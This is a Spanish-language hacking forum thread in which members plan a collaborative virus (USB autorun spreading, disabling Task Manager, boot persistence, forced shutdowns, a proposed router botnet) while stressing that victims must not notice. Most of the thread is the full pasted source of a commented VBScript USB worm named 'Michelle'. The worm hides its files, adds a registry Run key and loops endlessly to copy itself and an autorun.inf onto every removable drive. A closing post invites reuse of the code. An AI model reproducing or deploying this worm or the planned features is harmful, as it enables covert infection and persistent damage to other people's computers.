Y dale con bloquear todas las webs, mira que eres pesado, si lo que quieres es joder ordenadores mejor les das con un martillo y así acabas antes...
Versión para imprimir
Y dale con bloquear todas las webs, mira que eres pesado, si lo que quieres es joder ordenadores mejor les das con un martillo y así acabas antes...
Es que, a ver Fruit, no toda la gente tiene amigos informaticos o sabe lo que es formatear. También por muy bueno que sea el virus, si le ha tocado a un licenciado en Seguridad Informática, lo va a quitar igualmente. Hay que pensar por la mayoría general. Digo lo de desactivar esas webs porque una amiga mía tenía un virus y no podía entrar en rapidshare ni nada, supongo para que no descargue un antivirus y quite el virus. ¿Lo entiendes ya? ;)
A la demás gente que le parece?
Pero vamos a ver, alma de cántaro, que no te enteras. Regla de oro:
El usuario no debe enterarse de que tiene un virus.
Lo puedo poner más grande si quieres.
Vamos a ver, empezar por lo básico, uno que se reproduzca en unidades flash, como el clásico autorun (en cristiano, un archivo autorun.inf y un virus.vbs), sobre ese después le agregais que modifique el registro para que deshavilite el administrador de tareas para el usuario actual y que autoaranque al encender (esto es chupado). Posteriormente que apague el equipo a cierta hora. El siguiente paso sería bajar privilegios al usuario (no es tan fácil, pero modificando el registro se puede conseguir). El clásico sistema de desarrollo basado en prototipos por refinamiento sucesivo, mejorando en cada nueva versión.
Bien, para empezar ya teneis parte del code (si lo haces en vbscript) en el último número de la ezine, buscais en mi artículo de vbscript y teneis code sobre el que podeis poneros a trabajar (realmente hay un script que puede serviros de base, si mal no recuerdo). Además de paso aprendeis un poco de vbscript que os hara falta.
Además para que esto sirva para otros dentro de un tiempo, pues aprovechamos y así vamos haciendo un artículo para el próximo número. Vais a ir escribiendo todo el proceso y posteriormente lo redactamos como un artículo y lo publicamos con todos los que participemos como autores. Por supuesto si estais conformes.
Saludos
Hola, me parece bien.
xo que funcionamiento quereis que tenga este virus? para que?
troyano,bot,keylogger...?
a mi me intereseria mucho hacer un botnet para routers (desde ke vi el supervirus CHUCK NORRIS ke iba colandose a routers y usandolos de bot)
seria interesante, ya que ahi no entra un antivirus ni lo van a formatear
un botnet? En VB? u.U empecemos por algo mas sencillo no? xD
Una botnet es de lo más fácil que hay.
Gracias por sus comentarios, quiza por la version de mi Windows funciona asi, y en el de uds funciona de otra manera, creo que bajare el parche de "hckr" para que no haya mayor problema, :D y mis demas BATCHS puedan correr en multiplataformas de windows sin problemas (es sarcasmo todo esto) jejeje,
y tbm digo PAZ esto es foro de comunicacion, soporte, ayuda y guia.
Bueno, a lo mejor este finde os hago yo el núcleo de un programa autoreplicante en vbscript para que empeceis a trabajar a partir de él.
Ok grax gondar :D
Las 1000 maneras de joder Windows... Microsoft recompensa a las ideas más originales con premios a los 3 primeros puestos... El slogan del concurso es: "Demuestra la robustez de nuestro SO".
Un saludo.
Solo 1000???
jaja claro que hay + de 1000. Con el admin abierto, cosa que no ocurre en linux, se pueden hacer muchas combinaciones. 1000 son pocas... :D
En linux lo mismo, incluso puede que más viendo distirbuciones como Ubuntu. Pero el primero y más peligroso problema de seguridad es el usuario. Y en otra era los de linux como solian ser users de cierto lvl y el SO era más controlado por muchos ojos (algo que hoy en día aunque en teoría sigue igual, en la práctica con tantas distribuciones, todos distintas... pues yo pondría en duda), ahora Linux es igual que windows, solo hay un punto que lo sigue protegiendo mucho y es que sigue siendo minoritario. Porque hoy en día hay el mismo porcentaje de users flojos en Linux que ne windows, con la diferencia de que se creen que Linux es seguro (la peor inseguridad es la falsa seguridad).
Saludos
en realidad, gondar, linux es seguro por el sistema de permisos que utiliza, y porque para ejecutar un comando administrativo, (aunque tu cuenta sea root) te pide la contraseña. Otra cosa es que las tripas de windows están al descubierto y tiene lectura y escritura completa del disco duro. Linux tiene el sistema de permisos que sólo te deja modificar o escribir por línea de comandos, es decir, pidiéndote la pass. En caso de infección en linux, inmediatamente sale un parche de actualización de seguridad.
Aún así, los escritores de virus no escriben para linux porque nadie lo utiliza...
Linux será bueno, rápido, seguro...etc, pero no puedo vivir sin nuestro querido Windows... :D
Linux no te vuelve a pedir la contraseña para nada una vez te haces root.
Una cosa es que la mayoría de los usuarios de Windows usen una cuenta administrativa para el día a día, pero eso no está bien. Windows tiene cuentas de usuario restringidas y administrativas (de hecho es muchísimo más configurable: prueba a escribir lusrmgr.msc en el menú Ejecutar). Y soporta ACL (listas de acceso) personalizadas por cada archivo. Eso no es posible en GNU/Linux nativamente. Pero me parece que SELinux hace algo parecido.
:confused:
En Windows también, ¿no conoces Windows Update?
Además el sistema de permisos usado por defecto es más seguro. Pero aún así, las cosas se cuelan a veces sobre todo por usuarios inexpertos, como ejemplo pongo ésto que pasó hace muy poco tiempo.
Copia y pega de un gusano de elhacker.net:
----------------------------------------------------------------------Código:'#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
' _____ .____________ ___ ______________.____ .____ ___________
' / \ | \_ ___ \ / | \_ _____/| | | | \_ _____/
' / \ / \| / \ \// ~ \ __)_ | | | | | __)_
' / Y \ \ \___\ Y / \| |___| |___ | \
' \____|__ /___|\______ /\___|_ /_______ /|_______ \_______ \/_______ /
' \/ \/ \/ \/ \/ \/ \/
' ____ ____ _________ ____ ____ ____ ____ ____ ____
' ||B |||Y ||| |||O |||C |||T |||A |||L |||H ||
' ||__|||__|||_______|||__|||__|||__|||__|||__|||__||
' |/__\|/__\|/_______\|/__\|/__\|/__\|/__\|/__\|/__\|
'
' - w0rm: Michelle
' - c0de: vbs
' - ver: 1.0
' - programer: OCTALH octalh[at]gmail[dot]com
' - Eres libre de modificar Y redistribuir este codigo siempre y cuando menciones
' la fuente y el autor.
'
'#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
' [ Caracteristicas w0rm ]
' + Infeccion: Simple
' + propagacion: Medios extraibles
' + Permanencia en sistema: Simple
' + Peligrosidad: depende >_<
'#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
' [ MODELO DE OBJETOS ]
Set fso = CreateObject("Scripting.FileSystemObject") ' ARCHIVOS
Set WshShell = WScript.CreateObject("WScript.Shell") ' REGISTRO
'#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
' [ CONSTANTES ]
w0rmname = WScript.ScriptName ' Indicamos que el nombre del gusano sera
' el que tenga en ese momento el archivo actual.
w0rm = "gusano.vbs"
'Nombre del exe que tendra el gusano en el sistema
w0rmpatch = fso.GetSpecialFolder(1) & "\" & w0rm
'Indicamos el directorio donde se copiara el gusano, si utilizamos
'la funcion specialfolder podemos indicar el copiado a la carpeta del sistema (1)
'sin importar donde se encuentre.
autorun = fso.GetSpecialFolder(1) & "\autorun.txt"
'lo mismo que en w0rmpatch pero para el autorrun.
w0rmusb = ":\TEM1000.exe" ' Nombre que tendra el gusano en el medio extraible
autorunusb = ":\autorun.inf" ' Nombre que tendra el autorun en el medio extraible
Const HKEY_LOCAL_MACHINE = &H80000002 'constante para modificar registro mas adelante
'#========================================================================================#
' [ CHEKEO DE INFECCION ]
if not infeccion(w0rm) then copiar w0rmname, w0rmpatch end if
' si no encuentras w0rm entonces copia w0rm a la carpeta de sistema
if not infeccion(autorun) then makeautorun() end if
'si no encuentras autorun entonces crealo
makeatributos()
'Agrega atributos a cada archivo que compone al w0rm
' + INFECTAR REGISTRO DE WINDOWS +
If not keyexist("gusano", "Software\Microsoft\Windows\CurrentVersion\Run\", _
HKEY_LOCAL_MACHINE) then crearentradareg()
'Si no existe la llave en el registro llamada gusano entonces la crea, con esto aseguramos
'el arranque del gusano con cada inicio del sistema.
'===========================
' ACTIVANDO LA PROPAGACION
infekusb()
'===========================
'# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
' TU MENSAJE A PROPAGAR
'
'# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'#========================================================================================#
' [ SUBPROCESOS Y FUNCIONES ]
'+----------------------------------------------------------------------------------------+
'Funcion que hace un checkeo de un archivo cualquiera (zz)
'si existe devuelve un valor de falso o verdadero
function infeccion(zz)
On Error Resume Next'<====Instruccion que se encarga de continuar con la ejecucion del
if fso.FileExists(zz) Then ' script incluso si existiera algun error.
infeccion = true
exit function
else
infeccion = false
exit function
end if
end function
'si encuentras un archivo (zz) entonces la funcion infeccion es verdadera de lo contrario
'es falsa,( recuerda que zz se puede sustituir por cualquier archivo )
'+----------------------------------------------------------------------------------------+
'Funcion que se encarga de copiar un archivo(pp) a una ubicaccion(mm)
function copiar (pp,mm)
On Error Resume Next
fso.CopyFile pp, mm, true
end function
'+----------------------------------------------------------------------------------------+
'Subproceso que se encarga crear un archivo y escribir datos en el
'en este caso le indicamos que cree un archivo con la constante autorun
'que definimos desde el principio
sub makeautorun()
On Error Resume Next
set mkaut = fso.createtextfile(autorun, True) 'creamos un archivo con el nombre de
mkaut.WriteLine "[AUTORUN]" 'la constante autorun
mkaut.WriteLine "open=" & w0rmusb 'constante del nombre del ejecutable.
mkaut.WriteLine "shell\1=abrir"
mkaut.WriteLine "shell\1\Command=" & w0rmusb
mkaut.WriteLine "shell\2\=explorar"
mkaut.WriteLine "shell\2\Command=" & w0rmusb
mkaut.WriteLine "shellexecute=" & w0rmusb
mkaut.close
end sub
'aqui creamos el autorun que sirve para ejecutar el gusano cuando la victima de doble click
'en el icono de la unidad extraible
'+----------------------------------------------------------------------------------------+
'subproceso que se encarga de añadir atributos de oculto, sistema y solo lectura
'a cada archivo que compone al w0rm
sub makeatributos()
On Error Resume Next
Dim archivosw0rm(1) 'array archivosw0rm que dentro de el contiene al gusano y su autorun
archivosw0rm(0) = w0rmpatch
archivosw0rm(1) = autorun
for each file in archivosw0rm ' por cada archivo dentro del array archivosw0rm
set wormcontent = fso.GetFile(file) 'tomalos y
wormcontent.attributes = 7 'agregales atributos
next
end sub
'+----------------------------------------------------------------------------------------+
'Funcion que se encarga de verificar que exista una llave en el registro
Function keyexist(keyname, keyPath, regCategory)
On Error Resume Next
retVal = false
strComputer = "." 'inicamos en cualquier computadora
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv") 'se crea un objeto
oReg.EnumKey regCategory, keyPath, arrSubKeys'partes de la clave del registro
For Each subkey In arrSubKeys
If keyname = subkey Then
retVal = true
Exit For
End If
Next
keyExists = retVal
End Function
'esta funcion basicamente se encarga de verificar que existan los valores que introduzcamos
'en ella que son keyname, keypath y regcategory, de esa manera comprobamos que exista
'cualquier llave en el registro con solo usar la funcion keyexist y el valor de nuestra
'llave a verficar
'+----------------------------------------------------------------------------------------+
'Subproceso que se encarga de crear la llave en el registro
private sub crearentradareg()
On Error Resume Next
WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\gusano", _
w0rmpatch, "REG_SZ"
end sub
'+----------------------------------------------------------------------------------------+
'Subproceso que se encarga de copiar al gusano a una unidad extraible.
private sub infekusb()
on error resume next
Const DriveTypeRemovable = 1 ' indicamos medio extraible
do ' inicia loop infinito
Set oFS = Wscript.CreateObject("Scripting.FileSystemObject")
Set oDrives = oFS.Drives 'declaramos todos los srivers
For Each Drive in oDrives 'por cada driver
If Drive.DriveType = DriveTypeRemovable Then 'si son del tipo removible entonces
If Drive.DriveLetter <> "A" Then ' si la letra es de A-Z entonces
If fso.FileExists(Drive.DriveLetter + autorunusb) Then ' si existe autorun
set cFile = fso.GetFile (Drive.DriveLetter + autorunusb)'tomalo y
cFile.attributes = 0 ' quitale los atributos
fso.CopyFile autorun, Drive.DriveLetter & autorunusb , true'despues copialo
else' de lo contrario
fso.CopyFile autorun, Drive.DriveLetter & autorunusb , true' copialo
End if
fso.CopyFile w0rmpatch, Drive.DriveLetter & w0rmusb , true' copia el gusano a la unidad
End If
End If
Next
loop
end sub
'aqui es donde quiza tengas mas duda asi que te lo explicare paso por paso
'primero obtenemos todos los drivers(unidades) que el sistema pueda tener, despues
'verificamos que sean del tipo extraible, una ves verificado eso tomamos la letra de la
'unidad y luego hacemos un checkeo para ver si existe el autorun en dicha unidad
'si existe le quita los atributos de solo lectura para poder sobreescribirlo y hacer
'una copia desde el autorun que esta en el sistema, como el del sistema ya tiene
'atributos de oculto sistema y solo olectura al copiarlo se copia con los mismos atributos
'y no tenemos que volver a agregarcelos en el medio extraible.
'¿porque le quito los atributos en el medio extraible?
'porque se puede dar el caso en el que dicho medio extraible se encuentre infectado por
'otro gusano que no sea el nuestro y ya viene con su propio autorun, entonces asi nos
'aseguramos que nuestro gusano sera el vencedor hehe
'tambien aqui tenemos un loop interesante inicia con la frase do y termina en loop
'lo que estamos haciendo es un bucle condicional pero sin condicion y apuntado a un objeto
'de esta forma creamos un bucle infinito y el copiado del gusano sera
'practicamente al instante.
Podemos extraer codigos de ese worm... No violamos el copyright... :D